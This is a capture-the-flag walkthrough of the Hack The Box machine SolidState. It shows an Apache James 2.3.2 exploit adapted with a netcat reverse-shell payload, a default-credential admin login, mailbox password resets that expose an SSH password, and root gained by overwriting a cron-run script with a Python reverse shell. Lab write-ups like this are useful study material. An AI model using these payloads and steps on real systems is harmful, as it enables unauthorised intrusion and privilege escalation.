Details
This machine is SolidState from Hack The Box
Recon
root@kali:~# nmap -sV -p- -T4 10.10.10.51
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-01 14:10 EDT
Nmap scan report for 10.10.10.51
Host is up (0.038s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
25/tcp open smtp JAMES smtpd 2.3.2
80/tcp open http Apache httpd 2.4.25 ((Debian))
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
4555/tcp open james-admin JAMES Remote Admin 2.3.2
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.66 secondsUser
A potential exploit for james https://www.exploit-db.com/exploits/35513, so I updated the payload to be
nc 10.10.14.15 4444 -e /bin/bashAnd ran it
root@kali:~# python 35513.py 10.10.10.51
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.So I set a listener for if it fires at some point
root@kali:~# nc -nlvp 4444I checked the site on port 80
And then tried the james admin using the default creds
root@kali:~# nc 10.10.10.51 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id: root
Password: root
Welcome root. HELP for a list of commandsI could login, so I looked for users
listusers
Existing accounts 6
user: james
user: ../../../../../../../../etc/bash_completion.d
user: thomas
user: john
user: mindy
user: mailadminSo I reset all the passwords
setpassword james james
Password for james reset
setpassword thomas thomas
Password for thomas reset
setpassword john john
Password for john reset
setpassword mindy mindy
Password for mindy resetI then logged into them to check for mail
root@kali:~# telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user john
+OK
pass john
+OK Welcome john
list
+OK 1 743
1 743
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <john@localhost>;
Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John,
Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.
Thank you in advance.
Respectfully,
James
.So I mindy might have a password in their mail
root@kali:~# telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user mindy
+OK
pass mindy
+OK Welcome mindy
list
+OK 2 1945
1 1109
2 836
.
retr 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <mindy@localhost>;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
username: mindy
pass: P@55W0rd1!2@
Respectfully,
James
.So creds of
mindy:P@55W0rd1!2@I tried that on ssh
root@kali:~# ssh [email protected]
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L
[SNIP]So my terminal was full of weird stuff, but back in my listener
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.51] 54776A shell had been fired back
id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)So I upgraded it
python -c "import pty;pty.spawn('/bin/bash')"
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ With a nicer shell, I grabbed the user flag
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -la
total 28
drwxr-x--- 4 mindy mindy 4096 Sep 8 2017 .
drwxr-xr-x 4 root root 4096 Aug 22 2017 ..
-rw-r--r-- 1 root root 0 Aug 22 2017 .bash_history
-rw-r--r-- 1 root root 0 Aug 22 2017 .bash_logout
-rw-r--r-- 1 root root 338 Aug 22 2017 .bash_profile
-rw-r--r-- 1 root root 1001 Aug 22 2017 .bashrc
drwxr-x--- 2 mindy mindy 4096 Aug 22 2017 bin
-rw------- 1 root root 0 Aug 22 2017 .rhosts
-rw------- 1 root root 0 Aug 22 2017 .shosts
drw------- 2 root root 4096 Aug 22 2017 .ssh
-rw------- 1 mindy mindy 33 Sep 8 2017 user.txt
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat user.txt
[REDACTED]Root
So I looked for world writable files
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ find / -perm -2 -type f 2>/dev/null
/opt/tmp.py
[SNIP]So I took a look
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ cd /opt
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls -la
drwxr-xr-x 3 root root 4096 Aug 22 2017 .
drwxr-xr-x 22 root root 4096 Jun 18 2017 ..
drwxr-xr-x 11 root root 4096 Aug 22 2017 james-2.3.2
-rwxrwxrwx 1 root root 105 Aug 22 2017 tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()So I will overwrite it with a reverse shell and see if any user runs it with cron
root@kali:~# nc -nlvp 5555
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.15",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > /opt/tmp.pyAnd after a bit of waiting
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.51] 60444
/bin/sh: 0: can't access tty; job control turned off
# A shell
# id
uid=0(root) gid=0(root) groups=0(root)It was a root shell. So I grabbed my flag
# cd /root
# ls -la
total 56
drwx------ 8 root root 4096 Sep 8 2017 .
drwxr-xr-x 22 root root 4096 Jun 18 2017 ..
-rw------- 1 root root 1 Dec 23 2017 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwx------ 8 root root 4096 Aug 22 2017 .cache
drwx------ 10 root root 4096 Aug 22 2017 .config
drwx------ 3 root root 4096 Aug 22 2017 .gnupg
-rw------- 1 root root 2946 Sep 8 2017 .ICEauthority
drwx------ 3 root root 4096 Aug 22 2017 .local
drwxr-xr-x 2 root root 4096 Aug 22 2017 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 33 Aug 22 2017 root.txt
-rw-r--r-- 1 root root 66 Aug 22 2017 .selected_editor
drwx------ 2 root root 4096 Aug 22 2017 .ssh
# cat root.txt
[REDACTED]